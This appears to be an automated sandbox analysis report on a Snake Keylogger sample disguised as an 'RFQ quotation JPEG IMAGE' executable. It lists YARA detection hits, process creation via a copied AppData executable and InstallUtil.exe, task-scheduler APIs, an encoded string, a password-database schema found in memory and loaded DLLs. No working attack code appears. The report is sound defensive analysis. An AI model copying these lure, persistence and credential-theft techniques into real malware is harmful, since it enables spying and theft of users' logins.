                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, -kk-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, 2-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, 2-.csBase64 encoded string: 'sS3EzkPIq3urKzyR2NKtwlJBNfVk8azCI8Wgp4QmoZJ4fZbaHSKWnckEtYSxsT42'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@3/3
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeFile created: C:\Users\user\AppData\Roaming\Gydvapkca.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: InstallUtil.exe, 00000002.00000002.4524686788.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003107000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4532616204.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeFile read: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe "C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Gydvapkca.exe "C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Gydvapkca.exe "C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rasman.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rtutils.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: mswsock.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: winhttp.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: winnsi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: secur32.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: schannel.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ntmarta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeSection loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptsp.dll
